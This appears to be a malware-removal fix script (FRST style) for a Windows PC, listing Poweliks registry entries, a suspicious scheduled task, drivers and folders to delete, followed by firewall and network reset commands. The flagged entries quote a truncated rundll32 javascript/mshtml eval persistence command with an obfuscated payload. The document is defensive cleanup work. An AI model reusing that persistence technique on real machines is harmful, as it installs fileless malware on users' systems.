HKU\S-1-5-21-3898602812-2674449479-855244470-1003\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
SearchScopes: HKU\.DEFAULT -> {F42D4712-298F-4502-8668-7B9940C3FB00} URL = http://www.basicseek...s={searchTerms}
SearchScopes: HKU\S-1-5-21-3898602812-2674449479-855244470-1003 -> {3BD44F0E-0596-4008-AEE0-45D47E3A8F0E} URL = http://search.xfinit...q={searchTerms}
BHO-x32: Updater For XFIN_PORTAL -> {bb46be07-13eb-4c49-b0f0-fc78b9ea4983} -> C:\Program Files (x86)\xfin_portal\auxi\comcastAu.dll No File
2014-11-18 14:17 - 2014-11-18 14:17 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-11-18 14:31 - 2012-12-15 02:58 - 00000000 ____D () C:\Users\Default\AppData\Local\SoftThinks
2014-11-18 14:31 - 2012-12-15 02:58 - 00000000 ____D () C:\Users\Default User\AppData\Local\SoftThinks
CustomCLSID: HKU\S-1-5-21-3898602812-2674449479-855244470-1003_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-3898602812-2674449479-855244470-1003_Classes\CLSID\{F6BF8414-962C-40FE-90F1-B80A7E72DB9A}\InprocServer32 -> C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\crypt32.dll (Microsoft Corporation)
Task: {3D0D98EA-3511-4AED-BAA0-360C12B4871C} - System32\Tasks\Test TimeTrigger => C:\Users\Grandma\AppData\Local\Temp\Runner.exe <==== ATTENTION
S1 AntiLog32; \??\C:\Windows\system32\drivers\AntiLog64.sys [X]
S3 keycrypt; system32\DRIVERS\KeyCrypt64.sys [X]
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON 
CMD: ipconfig /flushdns 
CMD: netsh winsock reset catalog
CMD: netsh int ip reset c:\resetlog.txt 
CMD: ipconfig /release
CMD: ipconfig /renew 
EmptyTemp: 
CMD: bitsadmin /reset /allusers